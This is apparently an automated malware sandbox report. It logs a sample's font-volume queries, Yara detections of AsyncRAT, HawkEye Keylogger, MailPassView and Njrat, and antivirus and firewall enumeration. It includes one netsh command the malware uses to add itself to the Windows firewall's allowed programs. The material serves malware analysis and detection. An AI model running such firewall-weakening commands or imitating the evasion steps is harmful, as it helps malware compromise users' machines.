Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\pgr.exe

Code function: 2_2_049804AE GetUserNameW,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00406278 GetVersionExA,

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Modifies the windows firewall

Show sources

Source: C:\Users\user\AppData\Roaming\servieda.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Users\user\AppData\Roaming\servieda.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE

Source: tmp87E4.tmp.exe, 0000000C.00000003.516960849.000000000506E000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE

Yara detected MailPassView

Show sources

Source: Yara match	File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1428, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4027e00.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
